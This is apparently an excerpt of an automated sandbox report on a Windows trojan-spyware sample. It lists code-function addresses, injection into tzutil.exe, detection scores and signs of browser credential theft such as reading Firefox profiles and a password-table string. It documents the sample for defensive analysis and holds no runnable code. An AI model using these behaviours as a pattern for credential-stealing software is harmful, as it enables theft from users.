                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 0_2_0737E1200_2_0737E120
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 0_2_073750390_2_07375039
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 0_2_0737BF100_2_0737BF10
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 0_2_0737BF000_2_0737BF00
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 0_2_07378D290_2_07378D29
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 0_2_0737BC480_2_0737BC48
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 0_2_0737DB700_2_0737DB70
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 0_2_07378B580_2_07378B58
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 0_2_07378B490_2_07378B49
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 0_2_0737C9F90_2_0737C9F9
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 0_2_0737C8200_2_0737C820
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 0_2_073788B90_2_073788B9
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 0_2_073788C80_2_073788C8
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_004189C34_2_004189C3
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0041021B4_2_0041021B
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_004012204_2_00401220
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_004102234_2_00410223
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_004022DE4_2_004022DE
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_004022E04_2_004022E0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_00416BCE4_2_00416BCE
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_00416BD34_2_00416BD3
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_004104434_2_00410443
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0040E4634_2_0040E463
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0040E5B34_2_0040E5B3
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0040262C4_2_0040262C
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_004026304_2_00402630
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_00402F504_2_00402F50
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0042EF234_2_0042EF23
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013FA1184_2_013FA118
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013501004_2_01350100
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013E81584_2_013E8158
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_014181CC4_2_014181CC
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_014141A24_2_014141A2
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_014201AA4_2_014201AA
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013F20004_2_013F2000
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0141A3524_2_0141A352
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_014203E64_2_014203E6
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0136E3F04_2_0136E3F0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_014002744_2_01400274
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013E02C04_2_013E02C0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013605354_2_01360535
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_014205914_2_01420591
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_014124464_2_01412446
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_014044204_2_01404420
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0140E4F64_2_0140E4F6
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013607704_2_01360770
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013847504_2_01384750
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135C7C04_2_0135C7C0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137C6E04_2_0137C6E0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013769624_2_01376962
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013629A04_2_013629A0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0142A9A64_2_0142A9A6
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013628404_2_01362840
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0136A8404_2_0136A840
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013468B84_2_013468B8
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138E8F04_2_0138E8F0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0141AB404_2_0141AB40
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01416BD74_2_01416BD7
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135EA804_2_0135EA80
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013FCD1F4_2_013FCD1F
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0136AD004_2_0136AD00
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01378DBF4_2_01378DBF
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135ADE04_2_0135ADE0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01360C004_2_01360C00
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01350CF24_2_01350CF2
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01400CB54_2_01400CB5
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01380F304_2_01380F30
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013A2F284_2_013A2F28
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01402F304_2_01402F30
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D4F404_2_013D4F40
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013DEFA04_2_013DEFA0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0136CFE04_2_0136CFE0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01352FC84_2_01352FC8
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0141EE264_2_0141EE26
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01360E594_2_01360E59
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0141EEDB4_2_0141EEDB
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01372E904_2_01372E90
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0141CE934_2_0141CE93
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0142B16B4_2_0142B16B
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0134F1724_2_0134F172
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0139516C4_2_0139516C
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0136B1B04_2_0136B1B0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0140F0CC4_2_0140F0CC
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0141F0E04_2_0141F0E0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_014170E94_2_014170E9
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013670C04_2_013670C0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0141132D4_2_0141132D
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0134D34C4_2_0134D34C
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013A739A4_2_013A739A
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013652A04_2_013652A0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_014012ED4_2_014012ED
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137B2C04_2_0137B2C0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_014175714_2_01417571
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013FD5B04_2_013FD5B0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013514604_2_01351460
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0141F43F4_2_0141F43F
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0141F7B04_2_0141F7B0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_014116CC4_2_014116CC
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013F59104_2_013F5910
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013699504_2_01369950
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137B9504_2_0137B950
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013CD8004_2_013CD800
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013638E04_2_013638E0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0141FB764_2_0141FB76
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137FB804_2_0137FB80
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0139DBF94_2_0139DBF9
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D5BF04_2_013D5BF0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01417A464_2_01417A46
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0141FA494_2_0141FA49
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D3A6C4_2_013D3A6C
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0140DAC64_2_0140DAC6
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013FDAAC4_2_013FDAAC
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013A5AA04_2_013A5AA0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01401AA34_2_01401AA3
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01411D5A4_2_01411D5A
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01417D734_2_01417D73
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01363D404_2_01363D40
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137FDC04_2_0137FDC0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D9C324_2_013D9C32
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0141FCF24_2_0141FCF2
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0141FF094_2_0141FF09
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01361F924_2_01361F92
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01323FD24_2_01323FD2
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01323FD54_2_01323FD5
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0141FFB14_2_0141FFB1
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01369EB04_2_01369EB0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02ED02C08_2_02ED02C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02EF02748_2_02EF0274
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E5E3F08_2_02E5E3F0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F103E68_2_02F103E6
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F0A3528_2_02F0A352
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02EE20008_2_02EE2000
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F081CC8_2_02F081CC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F041A28_2_02F041A2
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F101AA8_2_02F101AA
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02ED81588_2_02ED8158
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E401008_2_02E40100
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02EEA1188_2_02EEA118
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E6C6E08_2_02E6C6E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E4C7C08_2_02E4C7C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E507708_2_02E50770
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E747508_2_02E74750
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02EFE4F68_2_02EFE4F6
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F024468_2_02F02446
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02EF44208_2_02EF4420
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F105918_2_02F10591
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E505358_2_02E50535
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E4EA808_2_02E4EA80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F06BD78_2_02F06BD7
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F0AB408_2_02F0AB40
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E7E8F08_2_02E7E8F0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E368B88_2_02E368B8
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E528408_2_02E52840
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E5A8408_2_02E5A840
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E529A08_2_02E529A0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F1A9A68_2_02F1A9A6
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E669628_2_02E66962
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F0EEDB8_2_02F0EEDB
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F0CE938_2_02F0CE93
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E62E908_2_02E62E90
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E50E598_2_02E50E59
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F0EE268_2_02F0EE26
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E5CFE08_2_02E5CFE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E42FC88_2_02E42FC8
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02ECEFA08_2_02ECEFA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02EC4F408_2_02EC4F40
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E92F288_2_02E92F28
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E70F308_2_02E70F30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02EF2F308_2_02EF2F30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E40CF28_2_02E40CF2
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02EF0CB58_2_02EF0CB5
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E50C008_2_02E50C00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E4ADE08_2_02E4ADE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E68DBF8_2_02E68DBF
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E5AD008_2_02E5AD00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02EECD1F8_2_02EECD1F
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02EF12ED8_2_02EF12ED
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E6B2C08_2_02E6B2C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E552A08_2_02E552A0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E9739A8_2_02E9739A
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E3D34C8_2_02E3D34C
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F0132D8_2_02F0132D
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F0F0E08_2_02F0F0E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F070E98_2_02F070E9
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02EFF0CC8_2_02EFF0CC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E570C08_2_02E570C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E5B1B08_2_02E5B1B0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E8516C8_2_02E8516C
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E3F1728_2_02E3F172
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F1B16B8_2_02F1B16B
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F016CC8_2_02F016CC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E956308_2_02E95630
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F0F7B08_2_02F0F7B0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E414608_2_02E41460
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F0F43F8_2_02F0F43F
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F195C38_2_02F195C3
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02EED5B08_2_02EED5B0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F075718_2_02F07571
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02EFDAC68_2_02EFDAC6
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02EEDAAC8_2_02EEDAAC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E95AA08_2_02E95AA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02EF1AA38_2_02EF1AA3
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02EC3A6C8_2_02EC3A6C
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F07A468_2_02F07A46
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F0FA498_2_02F0FA49
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E8DBF98_2_02E8DBF9
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02EC5BF08_2_02EC5BF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E6FB808_2_02E6FB80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F0FB768_2_02F0FB76
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E538E08_2_02E538E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02EBD8008_2_02EBD800
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E599508_2_02E59950
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E6B9508_2_02E6B950
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E59EB08_2_02E59EB0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E13FD28_2_02E13FD2
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E13FD58_2_02E13FD5
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F0FFB18_2_02F0FFB1
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E51F928_2_02E51F92
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F0FF098_2_02F0FF09
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F0FCF28_2_02F0FCF2
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02EC9C328_2_02EC9C32
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E6FDC08_2_02E6FDC0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F07D738_2_02F07D73
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E53D408_2_02E53D40
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F01D5A8_2_02F01D5A
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_026A21308_2_026A2130
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0269D2708_2_0269D270
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0269B2908_2_0269B290
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0269B3E08_2_0269B3E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0269D0488_2_0269D048
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0269D0508_2_0269D050
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_026A57F08_2_026A57F0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_026A3A008_2_026A3A00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_026A39FB8_2_026A39FB
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_026BBD508_2_026BBD50
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D5E4268_2_02D5E426
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D5E5448_2_02D5E544
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D5E8DC8_2_02D5E8DC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D5D9A88_2_02D5D9A8
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D5CC488_2_02D5CC48
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 02E97E54 appears 111 times
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 02ECF290 appears 105 times
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 02E85130 appears 50 times
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 02E3B970 appears 279 times
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 02EBEA12 appears 86 times
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: String function: 01395130 appears 58 times
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: String function: 0134B970 appears 280 times
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: String function: 013A7E54 appears 102 times
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: String function: 013CEA12 appears 86 times
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: String function: 013DF290 appears 105 times
                Source: 0Wu31IhwGO.exe, 00000000.00000002.1676770459.0000000003BE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs 0Wu31IhwGO.exe
                Source: 0Wu31IhwGO.exe, 00000000.00000002.1683020776.000000000A520000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs 0Wu31IhwGO.exe
                Source: 0Wu31IhwGO.exe, 00000000.00000002.1680248907.0000000006FC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs 0Wu31IhwGO.exe
                Source: 0Wu31IhwGO.exe, 00000000.00000000.1420857524.000000000089A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVcmB.exe4 vs 0Wu31IhwGO.exe
                Source: 0Wu31IhwGO.exe, 00000000.00000002.1675878996.000000000103E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 0Wu31IhwGO.exe
                Source: 0Wu31IhwGO.exe, 00000004.00000002.2324759370.0000000000D57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenametzutil.exej% vs 0Wu31IhwGO.exe
                Source: 0Wu31IhwGO.exe, 00000004.00000002.2325226087.000000000144D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 0Wu31IhwGO.exe
                Source: 0Wu31IhwGO.exe, 00000004.00000002.2324759370.0000000000D37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenametzutil.exej% vs 0Wu31IhwGO.exe
                Source: 0Wu31IhwGO.exeBinary or memory string: OriginalFilenameVcmB.exe4 vs 0Wu31IhwGO.exe
                Source: 0Wu31IhwGO.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0Wu31IhwGO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@7/6
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\0Wu31IhwGO.exe.logJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\tzutil.exeFile created: C:\Users\user\AppData\Local\Temp\UQ63g7r-Jump to behavior
                Source: 0Wu31IhwGO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0Wu31IhwGO.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: tzutil.exe, 00000008.00000002.3282626615.0000000002865000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.3282626615.0000000002888000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.2514155110.0000000002836000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.2514266920.0000000002858000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.3282626615.0000000002858000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 0Wu31IhwGO.exeReversingLabs: Detection: 73%
                Source: 0Wu31IhwGO.exeVirustotal: Detection: 76%
                Source: unknownProcess created: C:\Users\user\Desktop\0Wu31IhwGO.exe "C:\Users\user\Desktop\0Wu31IhwGO.exe"
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess created: C:\Users\user\Desktop\0Wu31IhwGO.exe "C:\Users\user\Desktop\0Wu31IhwGO.exe"
